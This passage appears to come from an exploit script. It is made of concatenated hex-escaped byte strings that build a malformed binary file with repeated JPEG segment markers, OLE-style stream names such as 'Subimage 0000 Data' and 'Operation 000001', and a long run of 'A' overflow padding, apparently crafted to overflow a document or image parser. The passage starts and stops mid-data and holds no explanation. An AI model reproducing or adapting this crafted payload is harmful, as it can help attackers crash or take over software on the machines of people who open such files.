+"\x29\x67\xf3\x82\x86\xde\xd8\xda\x78\xdb\x9e\x3f\x1c\x55\xea\xa3" +"\x89\x43\x3f\x9c\xea\xcd\xbc\x90\x54\x63\x0b\x9e\x07\xd7\x15\x4f" +"\x62\x16\xe1\x45\x14\x54\x96\x14\x51\x45\x00\x14\x51\x45\x00\x00" +"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" +"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" +"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" +"\x00\xf5\x5a\x28\xa2\x80\x0a\x2a\x29\xee\x21\xb7\xf2\xfc\xe9\x15" +"\x3c\xc6\x08\x99\x3f\x79\x8f\x61\x51\xc9\x71\x20\x9d\x56\x34\x53" +"\x16\x0e\xe6\x2d\x82\x0f\x60\x06\x28\x02\xcd\x57\x5b\xb8\x64\x0f" +"\xe5\x36\xe2\x8c\x50\xf0\x47\x22\xa0\xc1\xf3\x9e\x52\xf2\x12\xe0" +"\x02\xa5\x8e\xd1\x8f\x41\xd0\x52\xd2\xb8\xec\xc6\xb1\x92\xe2\xd3" +"\xc9\xbb\xdb\x97\x18\x71\x11\x20\x7e\x07\xad\x38\x0c\x00\x07\x41" +"\xc5\x14\x50\xdd\xc6\x95\x8b\x3f\x68\x89\x91\x9a\x37\x59\x0a\x92" +"\x30\xac\x0f\x23\xb5\x56\x92\x49\x6e\x6c\xc2\x36\xfb\x67\x75\x1b" +"\xbc\xb7\x05\x94\xfa\x03\x48\xaa\xaa\x30\xaa\x14\x67\x38\x03\x14" +"\xb4\x5f\xb0\xb9\x7b\x8a\x49\x3d\x49\x34\x94\x51\x48\xa0\xa2\x8a" +"\x28\x00\xa2\x8a\x6c\xd2\xc7\x04\x4d\x2c\xd2\x2c\x71\xa8\xcb\x33" +"\x1c\x01\x40\x87\x51\x45\x14\x0c\x28\xa2\x8a\x00\x28\xa0\xf0\x32" +"\x6a\xa5\xb5\xdc\xb7\x73\x07\x82\x1d\xb6\x83\x3f\xbd\x93\x21\xa4" 
+"\xf4\xda\xbe\x9e\xe7\xf0\xa6\x95\xc9\x6d\x2d\x05\xb9\xbe\x48\x65" +"\xf2\x21\x46\xb8\xb9\x23\x22\x14\x3d\x07\xab\x1e\x8a\x3e\xbf\x86" +"\x6a\x69\x6d\xe1\x9d\xa3\x69\xa2\x57\x68\x8e\xe4\xdc\x33\xb4\xfa" +"\xd3\xc2\xaa\xb3\x32\xa8\x05\xb9\x62\x07\x27\xeb\x4b\x45\xfb\x05" +"\xbb\x85\x14\x51\x48\xa0\xa8\xae\xa6\x68\x22\xdc\x90\xc9\x33\x93" +"\x85\x48\xc7\x53\xee\x7a\x01\xee\x6a\x5a\x29\xa1\x32\x0b\x45\xba" +"\x08\xcd\x78\xe8\x5d\x8e\x42\x46\x3e\x58\xc7\xa6\x7a\x9f\xad\x4f" +"\x45\x9c\x45\xde\x77\x90\x4c\x06\xfd\xaa\x1c\x8d\xb8\x00\x72\xb8" +"\xed\xcf\x7f\x4a\xce\x7d\x5e\xd6\x16\xb8\x16\xc9\x71\x78\x56\x4c" +"\x7c\xcc\x02\xfb\x85\x3e\x82\x94\xe4\xa2\xb9\xa4\xec\x85\x0b\xbd" +"\x16\xa6\x8d\x15\x90\x9a\xc1\x86\xdd\x40\xb3\xb8\x9d\xd8\xb1\x6d" +"\xf3\x2e\x53\x9e\x06\x7b\xd3\x97\x55\x54\x22\xdf\xec\xf7\x2f\x1e" +"\x31\xf6\x86\x95\x77\xfd\x71\xeb\x58\xfd\x62\x8f\xf3\xaf\xbc\xd3" +"\xd9\xd4\xfe\x56\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" +"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" +"\x11\x03\x11\x00\x3f\x00\xf4\x7a\x28\xa2\xa4\xb0\xa2\x9a\xf2\x24" +"\x6a\x1a\x47\x54\x04\x80\x0b\x1c\x72\x7a\x0a\x82\xee\xde\x7b\x86" +"\x58\xd6\xe0\xc3\x06\x3f\x79\xb3\x89\x1b\xd8\x1e\xc3\xf5\xa6\x91" +"\x2d\xdb\x62\x5b\x86\x99\x61\x63\x6f\x1a\xc9\x2f\x45\x0e\xdb\x47" +"\xd4\x9a\x65\xa4\x12\xc4\x19\xa7\xb8\x69\xe5\x7c\x6e\x3d\x14\x7b" +"\x2a\xf6\x1f\xad\x49\x0c\x51\xc1\x0a\x43\x0a\x04\x8d\x06\x15\x47" +"\x61\x4f\x24\x2a\x96\x62\x00\x03\x24\x9e\x82\x8b\xf4\x41\x6d\x6e" +"\xc5\xeb\x58\x17\x9a\x85\xd6\xab\x72\xfa\x76\x88\xc1\x51\x78\xb8" +"\xbd\xea\xb1\xfb\x2f\xa9\xff\x00\x3e\xf4\xc9\xae\x6e\x7c\x43\x33" +"\xda\xe9\xce\xd0\x69\xca\x76\xcd\x74\x38\x32\x7a\xaa\x7f\x8f\xf9" +"\x3b\x76\x76\x90\x58\xda\xa5\xb5\xac\x62\x38\x93\xa0\x1f\xcc\xfa" +"\x9a\xd6\xca\x9e\xb2\xdf\xb7\x6f\x5f\xf2\x31\xbb\xab\xa4\x76\xef" 
+"\xdf\xd3\xfc\xc9\xaa\x25\xb9\x85\xae\x9a\xd9\x64\x56\x99\x17\x73" +"\x20\xe7\x68\xf7\xf4\xa6\xc7\x22\xde\xd9\x96\x4f\x3a\x25\x90\x10" +"\xac\x46\xc6\xc7\xf7\x87\x71\xed\x4e\xb6\xb6\x86\xd2\x11\x15\xbc" +"\x62\x34\xce\x70\x3a\x93\xea\x4f\x73\xee\x6b\x2b\x25\xb9\xb5\xdb" +"\xdb\x62\x25\xb1\x8c\xdd\xfd\xaa\xe1\xda\x79\x14\x9f\x2f\x7f\xdd" +"\x88\x7f\xb2\x3d\x7d\xfa\xd5\xaa\x2a\x1b\xcb\xb8\x2c\xad\x5e\xe2" +"\xea\x41\x1c\x48\x32\x49\xfe\x43\xd4\xd3\xd6\x4e\xc1\x65\x15\x71" +"\xf3\x4b\x1c\x10\xb4\xb3\x3a\xc7\x1a\x0c\xb3\x31\xc0\x02\xb0\x33" +"\x73\xe2\x79\x08\x1e\x65\xb6\x8e\xa7\xd3\x0f\x73\x8f\xe4\xbf\xe7" +"\xe8\xb0\xdb\xdc\xf8\x8e\x55\xba\xd4\x11\xa0\xd3\x14\xee\x86\xd7" +"\x3c\xcb\xe8\xcf\xed\xed\xfe\x4f\x42\xa0\x2a\x85\x50\x15\x54\x60" +"\x00\x30\x00\xad\x74\xa5\xfe\x2f\xcb\xfe\x09\x8e\xb5\x77\xf8\x7f" +"\x3f\xf8\x03\x61\x8a\x38\x21\x48\x61\x45\x90\xeb\x07\xcc\x56\x7b" +"\x01\x10\x41\x41\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xd7\xf0\xa5" +"\x09\xc6\xa6\xb1\x69\x97\x25\x28\xee\x86\x51\x49\x1b\x89\x23\x59" +"\x17\x3b\x58\x06\x19\x18\xe0\xd2\xd5\x08\x28\xa2\x8a\x06\x00\xff" +"\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff" +"\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03" +"\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00" +"\xef\x74\xcd\x3a\xdb\x4b\xb4\x16\xf6\xab\x81\xd5\x98\xfd\xe7\x3e" +"\xa4\xd5\xaa\x28\xa4\xdb\x6e\xec\xa4\x94\x55\x90\x53\x64\x90\x45" +"\x1b\xc8\xdd\x11\x4b\x1f\xc0\x66\x9d\x59\xbe\x24\x9c\x5b\xf8\x7a" +"\xf6\x4c\xe0\x98\x8a\x0f\xab\x71\xfd\x69\xc6\x3c\xd2\x48\x53\x97" +"\x2c\x5c\xbb\x10\x78\x45\x18\x68\x11\xcc\xe3\x0f\x71\x23\xca\x7f" +"\x13\xff\x00\xd6\xad\x9a\xad\xa6\x41\xf6\x5d\x2e\xd6\x0f\xf9\xe7" +"\x12\xa9\xfa\xe3\x9a\xb3\x4e\xa4\xb9\xa6\xd9\x34\xa3\xcb\x04\x82" +"\xb0\x75\x1f\xf8\x93\xeb\xf0\xea\x6b\x91\x6b\x77\x88\x6e\xbd\x15" +"\xbf\x85\xbf\xcf\xf5\xad\xea\x82\xfe\xd2\x2b\xfb\x19\xad\x27\x1f" +"\x24\xab\x8c\xfa\x1e\xc7\xf0\x34\x53\x92\x8b\xd7\x60\xa9\x17\x25" +"\xa6\xeb\x62\x7a\x28\xa2\xa0\xd0\x2b\x13\xc5\x27\xcd\x82\xc6\xc8" +"\x75\xb9\xbb\x45\x23\xfd\x91\xc9\xfe\x95\xb7\x58\x97\xdf\xe9\x1e" +"\x30\xd3\x61\xed\x6f\x0c\x93\x91\xf5\xe0\x7f\x2a\xd6\x8f\xc5\x7e" +"\xda\x98\xd6\xf8\x2d\xde\xc8\xdc\x3d\x78\xa4\xa2\x8a\xc8\xd8\x28" +"\xa2\x8a\x00\x28\xa2\x8a\x00\x2b\x17\x4d\x3e\x7f\x8b\x35\x59\xfb" +"\x42\x91\xc0\xa7\xf0\xc9\xfe\x55\xb5\xc7\x7e\x95\x89\xe1\x31\xe6" +"\x58\xdd\x5e\x1e\x4d\xd5\xd4\x92\x67\xdb\x38\x1f\xd6\xb5\x86\x91" +"\x93\xf9\x7f\x5f\x71\x8c\xf5\x9c\x57\xcf\xfa\xfb\xcd\xba\x28\xa2" +"\xb2\x36\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x20\xbf\x32\x8d\x3e\xe3" +"\xec\xea\x5e\x6f\x29\xb6\x28\xea\x5b\x1c\x54\x1a\x15\xab\x59\x68" +"\x76\x96\xee\xbb\x1d\x23\x05\xd4\xf6\x63\xc9\xfe\x75\x7a\x8a\xae" +"\x6f\x77\x94\x8e\x5f\x7b\x98\x28\xa2\x8a\x92\xc2\x8a\x28\xa0\x00" 
+"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" +"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" +"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" +"\x00\xf4\x7a\x2b\x23\xc3\x77\x92\xcb\x69\x25\x8d\xd9\xff\x00\x4b" +"\xb1\x6f\x2a\x4c\xff\x00\x10\xfe\x16\xfc\xab\x5e\x89\xc5\xc5\xd9" +"\x84\x24\xa7\x15\x24\x54\xd4\xf4\xcb\x5d\x52\xdf\xca\xba\x4c\x91" +"\xca\x48\xbc\x32\x1f\x50\x6b\x2e\x3d\x42\xf3\x43\x91\x6d\xf5\x92" +"\xd7\x16\x84\xe2\x3b\xe5\x5e\x9e\xce\x3f\xaf\xf3\xad\xfa\x6c\x91" +"\xa4\xb1\xb4\x72\xa2\xba\x30\xc3\x2b\x0c\x82\x2a\xa3\x3b\x2e\x59" +"\x6a\xbf\xad\x89\x95\x3b\xbe\x68\xe8\xff\x00\xad\xc5\x47\x59\x11" +"\x5e\x36\x0e\x8c\x32\x19\x4e\x41\x14\x92\x22\xcb\x1b\x46\xe3\x2a" +"\xc3\x04\x7b\x56\x03\xd8\xde\xe8\x0e\xd3\xe9\x21\xae\x6c\x09\xdd" +"\x25\x99\x39\x64\xf5\x28\x7f\xa7\xf3\xad\x7d\x3b\x51\xb5\xd4\xed" +"\xbc\xfb\x49\x37\x2f\x46\x53\xc3\x21\xf4\x23\xb5\x12\x85\x97\x34" +"\xc6\x9a\x48\x96\xd9\x01\x17\x57\x12\xec\x59\xc8\x20\xfc\xc5\x3a" +"\x2f\xb6\x7b\x9a\x5f\xb3\xcf\x2a\x3f\x95\x73\x22\xbc\x6e\x40\xc9" +"\xe0\xfd\x6a\xf2\x08\xa1\x51\x1a\xe1\x40\xed\x50\xdb\x3a\xab\x4f" +"\xb9\x80\xcc\x84\x8c\xfd\x05\x3e\x61\x72\xf7\x2c\x64\xb1\x20\xa9" +"\x03\xd7\xd6\x9b\x20\x64\x88\xf9\x2a\x0b\x76\x06\xa4\xa2\xa0\xd0" +"\xa1\x14\x57\x0d\x76\x25\x9a\x08\xf8\x3c\x31\x6c\x91\xf4\xf4\xab" +"\xf4\x52\x12\x00\xc9\x38\x1e\xf4\x01\x5a\xf7\xcf\x2b\xb2\x28\x52" +"\x44\x60\x77\x06\x35\x2d\xb1\x73\x6e\x86\x44\x11\xb6\x39\x51\xda" +"\x87\x9d\x47\x0b\xc9\xaa\xf2\x4e\xc7\x8c\xf3\xe8\x28\x0b\x10\x6a" +"\xee\xeb\x0b\xb4\x64\x83\x91\xca\xd6\x24\x37\x17\x9e\x79\xdd\x23" +"\x91\xb8\x6d\xc1\x26\xb5\x89\x7b\x86\x21\x1b\x6c\x63\xef\x38\xef" +"\xec\x3f\xc6\xab\x47\x6e\x57\xca\x9a\x37\x29\xe6\x1c\x67\xa8\x07" +"\x3c\x64\x57\x3d\x4c\x33\xa9\x35\x2e\x6b\x1a\x46\xb7\x24\x6d\xcb" +"\x73\xa2\xa6\xb3\xaa\xfd\xe3\x8a\x86\x69\x18\x39\x50\x70\x2a\x1a" 
+"\xde\xe4\x58\x99\xae\x0f\xf0\x0f\xc4\xd4\x4c\xc4\xf2\xc7\xf3\xa4" +"\x3c\x0e\x99\xa8\x5a\x68\x95\xf1\x34\x8a\xa7\xae\xd2\x69\x37\xdc" +"\x76\x1e\x5f\x20\x90\x70\xa3\xab\x1a\x80\x03\x73\x9c\x65\x61\xee" +"\x7b\xbf\xff\x00\x5a\x9a\xb2\x25\xdc\xdb\x59\xd4\xa0\x3f\x2a\x03" +"\x9d\xde\xe6\xae\x0e\x9c\x74\xa6\x9a\xe8\x2b\x5f\x72\x2b\x82\x22" +"\xb4\x7d\xa3\x00\x2e\x00\x14\x79\x2a\xd6\xa2\x16\xce\x36\xe3\x8e" +"\xb4\x5c\x23\x49\x18\x55\xee\xc3\x3f\x4c\xd4\xb4\x5f\x40\xb6\xa0" +"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" +"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" +"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11" +"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00" +"\x40\x00\x00\x00\x37\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" +"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00" +"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11" +"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" +"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" +"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00" +"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x2a\x00\x02\x01\x15\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x6e\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00" +"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" +"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00" +"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x6f\x00\x00\x00\x5e\x02\x00\x00\x00\x00\x00\x00" +"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00" +"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00" +"\x30\x00\x30\x00\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x28\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x02\x00\x00\x00\x94\x00\x00\x00\x00\x00\x00\x00" +"\x05\x00\x4f\x00\x70\x00\x65\x00\x72\x00\x61\x00\x74\x00\x69\x00" +"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00" +"\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x24\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00" +"\x75\x41\x1a\x97\x7c\xb2\x56\x61\x6d\x6b\x35\xb4\xbb\x56\xe9\xe5" +"\xb7\xc7\x11\xca\x37\x32\x9f\x66\xea\x47\xd7\x3f\x5a\x94\x5d\x5b" +"\x9b\xa3\x6b\xe6\xa8\x9c\x0c\xf9\x67\x82\x47\xa8\xf5\xfc\x2a\x5a" +"\x8a\xe6\xd6\x0b\xb8\xbc\xbb\x98\x96\x45\x1c\x8c\x8e\x41\xf5\x07" +"\xb1\xfa\x54\xde\xef\x52\xac\xd2\xf7\x4c\x6d\x6c\x1d\x2f\x54\xb7" +"\xd6\xe3\x07\xca\xe2\x1b\xb0\x3b\xa9\xe8\xdf\x87\xf8\x56\xf0\x20" +"\x80\x41\x04\x11\x90\x47\x7a\x8e\xe6\x08\xee\xad\xa4\xb7\x9d\x77" +"\x47\x22\x95\x61\xec\x6b\x27\xc3\x73\xcb\x12\xcf\xa4\x5d\xb6\x67" 
+"\xb1\x6d\xaa\xc7\xf8\xe3\x3f\x74\xff\x00\x9f\x6a\xd1\xfb\xf0\xbf" +"\x55\xf9\x19\xaf\x72\x76\xe8\xff\x00\x33\x6a\x8a\x28\xac\x4d\xc2" +"\xb2\x35\x1d\x14\xbd\xc9\xd4\x34\xa9\x45\xa5\xf8\xea\x47\xdc\x97" +"\xd9\x87\xf5\xad\x7a\x2a\xa3\x27\x17\x74\x44\xe0\xa6\xac\xcc\xad" +"\x33\x5a\x5b\x89\xcd\x8d\xfc\x5f\x63\xd4\x17\xac\x4d\xd1\xfd\xd4" +"\xf7\xad\x5a\xa7\xa9\xe9\x96\xba\xa5\xbf\x95\x72\xb8\x65\xe5\x24" +"\x5e\x19\x0f\xa8\x35\x99\x16\xa5\x79\xa2\xca\xb6\xba\xe1\x33\x5b" +"\xb1\xc4\x57\xca\xbc\x7d\x1c\x76\x3f\xe7\x9a\xd3\x95\x4f\x58\x6f" +"\xdb\xfc\x8c\xf9\xdd\x3d\x27\xb7\x7f\xf3\x37\xeb\x0f\xc4\x31\xbd" +"\x95\xc5\xbe\xb9\x6e\xa5\x9a\xdb\xe4\x9d\x47\xf1\xc4\x7f\xc3\xfc" +"\xf4\xad\xca\x6c\x91\xa4\xb1\x34\x72\x28\x64\x70\x55\x94\xf7\x07" +"\xa8\xa8\x84\xb9\x65\x72\xea\x43\x9e\x36\x08\xe4\x49\x62\x49\x62" +"\x60\xc8\xea\x19\x58\x77\x07\xa5\x3a\xb0\xfc\x3c\xef\x63\x75\x71" +"\xa1\xdc\x31\x2d\x01\xf3\x2d\xd8\xff\x00\x14\x44\xff\x00\x4f\xf3" +"\xd2\xb7\x28\x9c\x79\x5d\x82\x9c\xf9\xe3\x70\xa2\x8a\x2a\x0d\x02" +"\x9b\x2c\x51\xcd\x13\x45\x32\x2c\x91\xb8\xc3\x2b\x0c\x82\x29\xd4" +"\x50\x20\xa2\x8a\x28\x19\x8d\xe2\x4b\x79\x63\x8e\x1d\x5a\xd1\x73" +"\x73\x62\x77\x11\xfd\xf8\xff\x00\x88\x7f\x9f\x7a\xd5\xb6\xb8\x8e" +"\xea\xd6\x2b\x88\x0e\xe8\xe5\x50\xca\x7d\x8d\x48\x40\x20\x82\x01" +"\x07\x82\x0f\x7a\xcb\xd1\x2c\x2e\x34\xc6\xba\xb5\x38\x36\x62\x4d" +"\xf6\xc7\x3c\x80\x7a\xae\x3d\xab\x5b\xa9\x42\xcf\x74\x63\x67\x19" +"\xdd\x6c\xff\x00\x33\x52\x8a\x28\xac\x8d\x82\x8a\x28\xb7\x44\x6b" +"\xe6\x66\xb6\xf9\xd6\x31\x89\xc8\x1d\x09\x3f\x28\x3f\x86\x7f\x1a" +"\x69\x5c\x4d\xd8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22" +"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11" +"\x03\x11\x00\x3f\x00\xf4\x7a\x2a\x29\xda\x68\x61\x06\xde\x11\x39" +"\x5c\x65\x0b\xed\x24\x7b\x13\xdf\xeb\x4d\xb5\xba\x8e\xe9\x5b\x62" 
+"\xc8\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x29\x59\xda\xe3" +"\xe6\x57\xb1\x3d\x14\x51\x48\xa0\xa2\x8a\x28\x01\x22\x55\x84\x30" +"\x85\x44\x61\x89\x27\x68\xc6\x49\xef\xf5\xa7\x2c\xd3\x43\x6b\xb4" +"\x66\xe6\x55\x5e\x0b\x90\xa5\xcf\xb9\x03\x03\xf2\xa4\xa2\x9d\xc5" +"\x60\xa5\xcd\x35\x59\x5d\x43\x23\x06\x52\x32\x18\x1c\x82\x29\x69" +"\x0c\xa7\x1c\x57\xb0\x4e\x00\x99\x6e\x6d\xd9\xb9\xf3\x78\x92\x31" +"\xec\x40\xc3\x0f\xaf\x3e\xf5\x6f\x7a\xf9\x82\x3d\xcb\xbc\x8c\x85" +"\xcf\x24\x7a\xe2\x96\xa1\xba\xb4\xb7\xbb\x50\x27\x8c\x31\x5f\xba" +"\xe0\xe1\x97\xdc\x11\xc8\xaa\xbd\xde\xa4\x59\xa5\xa1\x35\x15\x0a" +"\x87\xb6\xb4\xc6\x66\xba\x64\x1c\x67\x1b\xdb\xf9\x0c\xd2\x5a\xde" +"\xdb\xdd\x6e\x10\xbf\xce\xbf\x7a\x37\x05\x5d\x7e\xaa\x79\x14\xac" +"\xf7\x1f\x32\xd9\x93\xd1\x45\x14\x8a\x39\xf6\xb4\xbd\xf0\xf3\x34" +"\xba\x62\xb5\xde\x9c\x4e\x5e\xd4\x9c\xbc\x7e\xa5\x0f\x7f\xa7\xff" +"\x00\xae\xb5\xf4\xfb\xfb\x5d\x4a\xd8\x4f\x67\x28\x91\x3b\x8e\xea" +"\x7d\x08\xed\x56\x6b\x1f\x50\xd1\x5b\xed\x27\x50\xd2\x25\x16\x97" +"\xbf\xc4\x31\xf2\x4d\xec\xc3\xfa\xd6\xdc\xca\xa7\xc5\xbf\x7f\xf3" +"\xff\x00\x33\x0e\x59\x53\xf8\x35\x5d\xbf\xcb\xfc\x8d\x8a\x2b\x2f" +"\x4b\xd6\x52\xee\x63\x67\x79\x11\xb3\xbf\x4f\xbd\x0b\xff\x00\x17" +"\xba\x9e\xe2\xb5\x2b\x39\x45\xc5\xd9\x9a\xc6\x6a\x6a\xe8\x29\x36" +"\x29\x90\x48\x55\x77\x81\x80\xd8\xe7\x1e\x99\xa5\xa2\xa4\x65\x39" +"\xe5\xbe\xb7\x99\x9d\x61\x5b\xab\x73\xfc\x31\xfc\xb2\x27\xe0\x78" +"\x6f\xd0\xd5\xc1\xcd\x15\x0d\xd5\xac\x77\x51\x85\x90\xba\x95\x3b" +"\x95\xe3\x72\xac\xa7\xd4\x11\x55\x74\xc5\x66\xb6\x26\xa2\xad\x08" +"\x21\x59\x9a\x61\x12\x09\x58\x05\x67\xc7\x24\x0e\x83\x35\x95\x3e" +"\xab\x63\x69\x77\x74\x96\xd6\xc6\x5b\x81\x8f\x30\xc6\xa0\x06\x6f" +"\x42\xc7\xb8\x15\x32\x71\x8a\xbc\x9d\x90\xd5\xdb\xb2\x43\x75\x4d" +"\x2a\xd7\x54\x84\x25\xc2\x90\xe9\xcc\x72\xa1\xc3\xa1\xf6\x35\x4e" +"\xc2\xef\x51\xb2\xbc\x8f\x4e\xd5\x63\x6b\x80\xfc\x43\x79\x1a\xe4" +"\x37\xb3\xfa\x1f\xf3\xef\x53\x47\xad\xa4\x30\xb3\xc3\xa5\x15\x92" 
+"\x47\x2c\xe8\x1d\x46\x4f\xf7\x89\xef\x4a\xba\xd4\x50\x6c\x8a\x0d" +"\x2c\x88\x9b\x97\xda\xca\x02\x92\x79\xe3\xbd\x4a\xc5\xd2\xb7\x2b" +"\x92\x6b\xd7\xfa\xff\x00\x82\x4b\xa1\x3b\xf3\x28\xb4\xff\x00\xaf" +"\xeb\xc8\xd2\xa2\xb3\x23\xd5\xed\xd5\x1e\xd0\x69\x7b\x6d\x42\x95" +"\x50\x0a\xe1\x87\xa6\xde\xd9\xa6\x9d\x62\x29\x2c\x1a\x09\x34\x8f" +"\x90\x00\xab\x01\x75\x2a\x56\xa3\xeb\x14\x7f\x9d\x1a\xfb\x3a\x9f" +"\xca\xcd\x5a\x2b\x32\x6d\x6a\x19\x60\x89\x66\xd2\x9a\x55\x27\x2e" +"\x99\x43\xb3\x07\x8c\x67\xad\x6d\x6c\xb6\xbb\x48\xe4\xdb\x1c\xaa" +"\xad\xbd\x1b\x19\xc1\x1d\xc7\xbd\x5c\x27\x09\xfc\x32\xb9\x32\x52" 